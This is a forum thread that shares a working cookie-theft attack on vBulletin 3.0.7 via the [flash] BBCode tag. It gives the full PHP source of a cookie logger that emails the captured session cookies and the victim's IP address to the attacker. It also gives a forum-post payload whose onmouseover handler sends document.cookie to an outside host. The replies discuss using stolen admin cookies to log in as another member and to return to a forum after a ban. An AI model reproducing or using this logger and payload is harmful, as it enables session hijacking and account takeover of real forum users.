Vbulletin 3.0.7 --> catch cookie (ie) Only if the balise [flash] is used Create a file log.php and insert the following code : Code: <?php /* S4aLog v1.0 [ Beta ] ----------------------- **Beta Of S4aLog v1.0 With Str_Repalce <;> ! You Can Get Cookies And Refresh The Broweser ! v0.10 [ New New New ] !Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies [ MSG ] Name : Attack1 Cookies : Cookies Refresh : http://www.s4a.xx [ MSG ]! ! Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121; ! [ New New New ] */ $YourMail = "[email protected]"; // Your E-mail /*-----------------------*/ $Ip = $REMOTE_ADDR; $Cooki_e = $_GET['id']; $NameOfAttack = $_GET['nm']; $Refresh = $_GET['re']; /* Start */ $ReplaceCookie1 = array("=",";"); $ReplaceCookie2 = array("[ "," ] "); $Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki _e); // Replace /* e.x hash=0210; | hash[0210]*/ //***************************************// $Hdr = "From: S4aLog <[email protected]>"; $Msg = " Mr Attacker ;) ,,, S4aLog v1 Beta << [ ".$NameOfAttack." ] ,, Name Of Attack [ ".$Refresh." ] ,, Refresh Page [ ".$Ip." ] ,, Ip [ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ] [ [email protected] - [email protected] ] ----------------------------------------------- Cookie :: ".$Cooki_e." "; /* ------------------------------------------------------------------------- */ $Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr); /************************************************** ***************************/ if($Send){ if($Refresh <> ""){header("location:".$Refresh);} } ?> To add following a message that you post on the forum targets the following code : Code: [flash=http://www.site.com/flash.swf]onmouseover='location.href="http://www.site.com/log.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document.Cookie'[/flash] Good work !
how i see... its a article (or something =)) how to steal cookies in vbulletin 3.0.7, but only if the balise [flash] is used... =) and if flash is used, you just need post message (look néM3S!s post)... короче на снифер and when your mouse over the flash - cookie will send to sniffer, right? =)
And what's the use of stealing cookies? To be automatically logged in as another member (admin, for example) there, right? I'm not sure this will help me to be back on that forum I was banned from though, because it's not vbulletin 3.0.7 it's 3.5.0 as well as I remember...